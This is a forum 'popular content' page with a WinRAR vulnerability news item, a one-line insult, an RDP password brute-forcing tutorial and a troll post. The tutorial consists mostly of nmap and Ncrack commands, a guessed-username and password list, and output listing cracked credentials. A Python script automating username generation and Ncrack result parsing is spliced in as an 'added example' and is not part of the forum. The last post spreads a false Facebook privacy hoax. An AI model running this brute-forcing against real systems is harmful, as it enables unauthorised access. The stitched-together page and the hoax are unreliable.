Leaderboard

Popular Content

Showing content with the highest reputation on 09/30/15 in all areas

  1. Beware, Windows users! A new, dangerous, unpatched zero-day vulnerability has been detected in the latest version of WinRAR, affecting millions of users worldwide. According to Mohammad Reza Espargham, a security researcher at Vulnerability-Lab, the stable version of WinRAR 5.21 for Windows computers is vulnerable to a Remote Code Execution (RCE) flaw.

     WinRAR is one of the most popular utility programs used to compress and decompress files, with more than 500 million installations worldwide. The WinRAR RCE vulnerability lies in the 'High Severity' block and scores 9 on the CVSS (Common Vulnerability Scoring System).

     HOW THE WINRAR VULNERABILITY WORKS

     Let's take a look at its actions. The vulnerability can be used by any attacker to smartly insert malicious HTML code inside the "Text to display in SFX window" section when the user is creating a new SFX file. A WinRAR SFX is an executable compressed file type containing one or more files, and it is capable of extracting its own contents.

     According to the proof-of-concept video published by Espargham, the latest WinRAR vulnerability allows remote hackers to execute arbitrary code on a victim's computer when the victim opens an SFX file (self-extracting file). The major disadvantage arises because of SFX files, as they start functioning as soon as the user clicks on them. Therefore, users cannot identify and verify whether the compressed executable file is a genuine WinRAR SFX module or a harmful one.

     NO PATCH YET AVAILABLE

     Unfortunately, there is no patch yet available to fix this vulnerability. However, Windows users are advised to:
     - Use alternative archiving software
     - Do not click files received from unknown sources
     - Use strict authentication methods to secure your system
    1 point
  2. Screw you.
    1 point
  3. DISCLAIMER
     All information provided is for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potentially damaging if used inappropriately. All characters and data written in this post are fictitious.

     The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted and exploited using a remote brute-force password guessing attack.

     For example, let's suppose that we are in the middle of a penetration testing session at the "MEGACORP" offices and we have already tried all the available remote attacks with no luck. We also tried ARP poisoning the LAN, looking to get usernames and passwords, without succeeding. From a previous nmap scan log we found a few Windows machines with the RDP port open and decided to investigate this possibility further.

     First of all we need some valid usernames, in order to guess only the passwords rather than both. We found the names of the IT guys on various social networking websites. These are the key IT staff:

         jessie tagle
         julio feagins
         hugh duchene
         darmella martis
         lakisha mcquain
         ted restrepo
         kelly missildine

     It didn't take long to create valid usernames following the common standard of using the first letter of the first name and the entire surname:

         jtagle
         jfeagins
         hduchene
         dmartis
         lmcquain
         trestrepo
         kmissildine

     Software required: a Linux machine, preferably Ubuntu, with nmap and a terminal server client:

         sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

     About Ncrack
     Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients.

     Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's, and many more. Protocols supported include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, and Telnet.
     Ncrack - High-speed network authentication cracker

     Installation

         wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
         mkdir /usr/local/share/ncrack
         tar -xzf ncrack-0.4ALPHA.tar.gz
         cd ncrack-0.4ALPHA
         ./configure
         make
         checkinstall
         dpkg -i ncrack_0.4ALPHA-1_i386.deb

     Information gathering
     Let's find out which hosts in the network are up, and save them to a text list. The regular expression will parse and extract only the IP addresses from the scan.

     Nmap ping scan, going no further than determining whether a host is online:

         nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

     Nmap fast scan with input from the list of hosts/networks:

         nmap -F -iL 192.168.56.0.txt

         Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST
         Nmap scan report for 192.168.56.10
         Host is up (0.0017s latency).
         Not shown: 91 closed ports
         PORT     STATE SERVICE
         88/tcp   open  kerberos-sec
         135/tcp  open  msrpc
         139/tcp  open  netbios-ssn
         389/tcp  open  ldap
         445/tcp  open  microsoft-ds
         1025/tcp open  NFS-or-IIS
         1026/tcp open  LSA-or-nterm
         1028/tcp open  unknown
         3389/tcp open  ms-term-serv
         MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

         Nmap scan report for 192.168.56.101
         Host is up (0.014s latency).
         Not shown: 96 closed ports
         PORT     STATE SERVICE
         135/tcp  open  msrpc
         139/tcp  open  netbios-ssn
         445/tcp  open  microsoft-ds
         3389/tcp open  ms-term-serv
         MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

         Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

     From the log we can see two machines with the Microsoft terminal service port (3389) open. Looking more in depth at the services available on the machine 192.168.56.10, we can assume that this machine might be the domain controller, and it's worth trying to pwn it.

     At this point we need to create a file (my.usr) with the probable usernames previously gathered:

         vim my.usr

         jtagle
         jfeagins
         hduchene
         trestrepo
         kmissildine

     We also need a file (my.pwd) for the passwords; you can look on the internet for common passwords and wordlists:

         vim my.pwd

         somepassword
         passw0rd
         blahblah
         12345678
         iloveyou
         trustno1

     At this point we run Ncrack against the 192.168.56.10 machine:

         ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

         Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST
         Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
         rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
         Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
         rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
         Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
         rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
         Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
         rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
         Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'
         rdp://192.168.56.10:3389 finished.

         Discovered credentials for rdp on 192.168.56.10 3389/tcp:
         192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
         192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
         192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
         192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
         192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

         Ncrack done: 1 service scanned in 98.00 seconds.
         Probes sent: 51 | timed-out: 0 | prematurely-closed: 0
         Ncrack finished.

     We can see from the Ncrack results that all the usernames gathered are valid, and we were also able to crack the login credentials since they were using weak passwords. Four of the IT staff have some kind of restriction on the machine; the exception is hduchene, who might be the domain administrator. Let's find out.

     source: http://bailey.st/blog/2011/05/12/remote-desktop-credentials-auditing-with-ncrack/
    1 point
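As an added example (this is not code from the original post, from bailey.st, or from the Ncrack project), the script below automates two steps of the procedure in the post above: deriving login candidates from the gathered staff names, and turning Ncrack's verbose output into the short list of accounts that are actually worth trying in a terminal server client. It assumes three things that the post does not state: the naming conventions other than first-initial + surname are common enterprise patterns added here; the embedded Ncrack output is constructed from the run shown in the post; and a "denied interactive logon" notice is taken to refer to the credential reported on the following "Discovered credentials" line, which is the reading under which the post's own conclusion (only hduchene unrestricted) holds.

```python
"""Username derivation and Ncrack result parsing for an RDP credential audit.

Added example, not code from the original post or from Ncrack. Assumptions:
naming conventions other than "flast" are common patterns not in the post;
SAMPLE_VERBOSE is constructed from the run shown in the post; a "denied
interactive logon" notice refers to the next "Discovered credentials" line.
"""
import re
from typing import Dict, List, Tuple

# Staff names as gathered in the post.
STAFF = [
    "jessie tagle", "julio feagins", "hugh duchene", "darmella martis",
    "lakisha mcquain", "ted restrepo", "kelly missildine",
]

# Constructed from the ncrack -vv run shown in the post.
SAMPLE_VERBOSE = """\
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST
Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'
rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
"""

DISCOVERED_RE = re.compile(
    r"^Discovered credentials on (?P<url>\S+) '(?P<user>[^']*)' '(?P<pw>[^']*)'\s*$")
SUMMARY_RE = re.compile(
    r"^(?P<host>\S+) (?P<port>\d+)/(?P<proto>tcp|udp) (?P<service>\w+): "
    r"'(?P<user>[^']*)' '(?P<pw>[^']*)'\s*$")
DENIED_MARKER = "denied interactive logon"


def derive_usernames(full_names: List[str], conventions=("flast",)) -> List[str]:
    """Build de-duplicated login candidates from 'first last' names.

    "flast" is the convention the post uses; the others are assumed,
    common alternatives worth trying when "flast" yields nothing.
    """
    seen, out = set(), []
    for name in full_names:
        parts = name.strip().lower().split()
        if len(parts) < 2:
            continue  # need both a first and a last name
        first, last = parts[0], parts[-1]
        forms = {
            "flast": first[0] + last,         # jtagle (the post's convention)
            "first.last": f"{first}.{last}",  # jessie.tagle (assumed)
            "firstl": first + last[0],        # jessiet (assumed)
            "last": last,                     # tagle (assumed)
        }
        for conv in conventions:
            candidate = forms[conv]
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


def parse_verbose(text: str) -> Dict[str, Tuple[str, bool]]:
    """Map username -> (password, restricted) from ncrack -vv output.

    A pending "denied interactive logon" notice is attached to the next
    discovered credential (assumption stated in the module docstring).
    """
    found: Dict[str, Tuple[str, bool]] = {}
    pending_restriction = False
    for line in text.splitlines():
        if DENIED_MARKER in line:
            pending_restriction = True
            continue
        m = DISCOVERED_RE.match(line.strip())
        if m:
            found[m["user"]] = (m["pw"], pending_restriction)
            pending_restriction = False
    return found


def parse_summary(text: str) -> List[Tuple[str, int, str, str, str]]:
    """Extract (host, port, service, user, password) from the final summary."""
    creds = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line.strip())
        if m:
            creds.append((m["host"], int(m["port"]), m["service"], m["user"], m["pw"]))
    return creds


def usable_for_rdp(found: Dict[str, Tuple[str, bool]]) -> List[str]:
    """Accounts with valid credentials that are not blocked from interactive logon."""
    return [user for user, (_, restricted) in found.items() if not restricted]


if __name__ == "__main__":
    print("candidate logins:", derive_usernames(STAFF))
    results = parse_verbose(SAMPLE_VERBOSE)
    for user, (pw, restricted) in results.items():
        print(f"{user:<12} {pw:<12} {'restricted' if restricted else 'interactive logon OK'}")
    print("try in tsclient:", usable_for_rdp(results))
```

The restricted accounts are not worthless: "denied interactive logon" means the credentials are valid, only that this logon type is blocked by policy, so they may still work for network logons such as SMB. That is also why a defender auditing with Ncrack should treat every line in the summary, not only the unrestricted ones, as a weak-password finding.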
  4. I've noticed that a lot of occasional "hackers" post on Facebook everything they see on RST. Let's make a bit of fun of them: post the announcement below and watch that Facebook crap fill up with all these crappy messages I post here. I've put it up and already half of my friends list has posted it. There are some idiots who actually believe Facebook would make conversations public, or would charge 6 dollars not to. They're not allowed to do that, it's written clearly: conversations are private, and besides, there's no way for them to check every single person who does or doesn't post this message on their timeline, etc. Well: Troll FTW

     Now it's official! It has been published in the media. Facebook has just released the entry price: $5.99 to keep the subscription of your status message set to "private". If you paste this message on your page, it will be offered for free (paste, do not share); if not, tomorrow all your posts may become public. Even messages that have been deleted or photos are not allowed. After all, it costs nothing to do a simple copy and paste; better safe than sorry, right. Channel 13 News was talking about this change in Facebook's privacy policy. Better safe than sorry. As of 26/09/2015 at 01:16 Eastern Standard Time, I do not give Facebook or any entities associated with Facebook permission to use my pictures, information, or messages, past and future. By this statement, I give notice to Facebook that it is strictly forbidden to disclose, copy, distribute, or take any other action against me based on this profile and/or its contents. The contents of this profile are private and confidential information. Violation of privacy can be punished by law (UCC 1-308- 1 1 308-103 and the Rome Statute). NOTE: Facebook is now a public entity. All members must post a note like this. If you prefer, you can copy and paste this version.
     If you do not publish a statement at least once, you will have tacitly allowed the use of your photos as well as the information contained in your profile status updates. DO NOT Share. You MUST copy and paste.
    -2 points